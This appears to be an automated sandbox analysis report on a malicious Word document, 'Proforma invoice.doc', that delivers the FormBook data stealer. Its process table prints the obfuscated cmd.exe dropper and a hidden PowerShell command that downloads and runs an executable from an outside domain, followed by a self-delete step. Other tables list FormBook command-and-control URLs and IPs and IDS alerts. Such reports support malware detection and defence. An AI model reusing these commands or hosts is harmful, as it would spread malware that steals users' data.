File name: | Proforma invoice.doc |
Full analysis: | https://app.any.run/tasks/3f862f76-dc6f-4525-873d-0e1717f3dabb |
Verdict: | Malicious activity |
Threats: | FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus. |
Analysis date: | January 17, 2019, 23:04:48 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: D!akov RePack, Template: Normal.dotm, Last Saved By: D!akov RePack, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 15 22:59:00 2019, Last Saved Time/Date: Tue Jan 15 22:59:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0 |
MD5: | 0AC75DBEB4025460CD9F076DCE9D9B7B |
SHA1: | 7E30F0B6614F3309DE4F7184EF38EFCB0D3A7266 |
SHA256: | 0DD37E4F6A326C5A21FE4052227B7FB81C3F2CA0B6E0ABC7607BD979D3B1E0CF |
SSDEEP: | 192:w+NslLZEvA+6/6rrILd/Kf3HO8teQMI9JRVEoS8CcJxuXyN0jBZdtpMia:wD8iSUR/8deU5S8PJUyN0jBLt+ |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 15 |
CharCountWithSpaces: | - |
Paragraphs: | - |
Lines: | - |
Company: | diakov.net |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | - |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:01:15 22:59:00 |
CreateDate: | 2019:01:15 22:59:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 2 |
LastModifiedBy: | D!akov RePack |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | D!akov RePack |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2796 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Proforma invoice.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3388 | "C:\Windows\System32\cmd.exe" /v:ON /c"set done= && set x=oi9Bx(5Wc;Tnd:3m1lJ.hz/EMLwH%y)bCeFD'jpS\as-utN,Yr fP && for %H in (38,0,26,33,49,42,20,33,17,17,50,43,26,50,27,1,12,12,33,11,50,43,23,4,33,8,44,45,1,0,11,52,0,17,1,8,29,50,3,29,38,41,42,42,50,5,11,33,26,43,0,31,37,33,8,45,50,39,29,42,45,33,15,19,46,33,45,19,7,33,31,32,17,1,33,11,45,30,19,35,0,26,11,17,0,41,12,34,1,17,33,5,36,20,45,45,38,42,13,22,22,51,49,0,1,12,51,0,11,12,43,42,45,33,37,33,41,11,11,33,12,41,49,8,19,51,49,22,37,44,31,41,37,33,0,19,33,4,33,36,47,36,28,10,23,24,52,28,40,37,44,31,41,37,33,0,19,33,4,33,36,30,9,50,28,10,23,24,52,28,40,37,44,31,41,37,33,0,19,33,4,33,1618) DO (set done=!done!!x:~%H,1!) && if %H == 1618 call !done:~-182!" | C:\Windows\System32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2408 | powershell -w Hidden -ExecutionPolicy Bypass (new-object System.Net.WebClient).DownloadFile('https://froidfond-stejeannedarc.fr/jubajeo.exe','C:\Users\admin\AppData\Local\Temp\jubajeo.exe'); C:\Users\admin\AppData\Local\Temp\jubajeo.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3416 | "C:\Users\admin\AppData\Local\Temp\jubajeo.exe" | C:\Users\admin\AppData\Local\Temp\jubajeo.exe | — | powershell.exe |
User: admin Company: EDP - Energias de Portugal Integrity Level: MEDIUM Description: Dynamic IP Restriction Module Exit code: 0 Version: 8.1.23.2 | ||||
4004 | "C:\Users\admin\AppData\Local\Temp\jubajeo.exe" | C:\Users\admin\AppData\Local\Temp\jubajeo.exe | — | jubajeo.exe |
User: admin Company: EDP - Energias de Portugal Integrity Level: MEDIUM Description: Dynamic IP Restriction Module Exit code: 0 Version: 8.1.23.2 | ||||
2360 | "C:\Windows\System32\svchost.exe" | C:\Windows\System32\svchost.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Host Process for Windows Services Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2764 | /c del "C:\Users\admin\AppData\Local\Temp\jubajeo.exe" | C:\Windows\System32\cmd.exe | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
116 | C:\Windows\Explorer.EXE | C:\Windows\explorer.exe | — | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3300 | "C:\Program Files\Mozilla Firefox\Firefox.exe" | C:\Program Files\Mozilla Firefox\Firefox.exe | svchost.exe | |
User: admin Company: Mozilla Corporation Integrity Level: MEDIUM Description: Firefox Exit code: 0 Version: 61.0.2 | ||||
2788 | C:\Windows\system32\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09} | C:\Windows\system32\DllHost.exe | svchost.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: COM Surrogate Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR906F.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF5881C997935F6612.TMP | — | |
MD5:— | SHA256:— | |||
2796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E9B5C50B-96A0-41DB-8BB7-089D393CEB15}.tmp | — | |
MD5:— | SHA256:— | |||
2796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{B4DCFD4A-55CF-4441-9A52-8099D202D2AC}.tmp | — | |
MD5:— | SHA256:— | |||
2408 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6WCDWQ140078QND173ZJ.temp | — | |
MD5:— | SHA256:— | |||
2408 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2408 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1a9849.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$oforma invoice.doc | pgc | |
MD5:B5D5FE2B7A3F92ADFA317221D110DEA0 | SHA256:A77505FB36F83A9AAFCFEDB1A8D3CFDE61A4EE8E0B510477018C93EBE00B3F08 | |||
116 | explorer.exe | C:\Users\admin\AppData\Local\Temp\Btz28\mfc2doplnh8.exe | executable | |
MD5:E519167AFECCF3EB21772197027A810C | SHA256:B9B342A1D65F1D0FCA1001B5C8291F867F01C9FCC62466030875C4F57E60CD56 | |||
2408 | powershell.exe | C:\Users\admin\AppData\Local\Temp\jubajeo.exe | executable | |
MD5:E519167AFECCF3EB21772197027A810C | SHA256:B9B342A1D65F1D0FCA1001B5C8291F867F01C9FCC62466030875C4F57E60CD56 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
116 | explorer.exe | GET | 200 | 199.192.26.77:80 | http://www.dozceb.com/sa/?jdGtQt20=DBnwY4qpJ55l7TSOih+BuRU/81Q6cTh263obRAs8UIvXq3uYxYb/U8TQzoBiEtLhDnXo0A==&TT=Ehd07BMX&sql=1 | US | binary | 323 Kb | malicious |
116 | explorer.exe | GET | 404 | 45.192.86.242:80 | http://www.greencupsz.com/sa/?jdGtQt20=Q1Qpf324E56oI4ymFIch4XRLZp35kFehtA8f2idRJrSJmrbbbkjf+KiZjoLfARN3FPrlDA==&TT=Ehd07BMX | ZA | html | 1.14 Kb | malicious |
116 | explorer.exe | POST | — | 199.192.26.77:80 | http://www.dozceb.com/sa/ | US | — | — | malicious |
116 | explorer.exe | POST | 404 | 199.192.26.77:80 | http://www.dozceb.com/sa/ | US | html | 288 b | malicious |
116 | explorer.exe | POST | 404 | 199.192.26.77:80 | http://www.dozceb.com/sa/ | US | html | 288 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
116 | explorer.exe | 45.192.86.242:80 | www.greencupsz.com | MacroLAN | ZA | suspicious |
116 | explorer.exe | 199.192.26.77:80 | www.dozceb.com | — | US | malicious |
2408 | powershell.exe | 213.186.33.40:443 | froidfond-stejeannedarc.fr | OVH SAS | FR | malicious |
Domain | IP | Reputation |
---|---|---|
froidfond-stejeannedarc.fr |
| malicious |
www.greencupsz.com |
| malicious |
www.readytraffic4update.review |
| unknown |
www.dozceb.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
116 | explorer.exe | A Network Trojan was detected | SC SPYWARE Trojan-Spy.Win32.Noon |
116 | explorer.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTTP-GET request with body and minimal header |
116 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (GET) |
116 | explorer.exe | A Network Trojan was detected | SC SPYWARE Trojan-Spy.Win32.Noon |
116 | explorer.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTTP-GET request with body and minimal header |
116 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (GET) |
116 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST) |
116 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (POST) |
116 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST) |
116 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (POST) |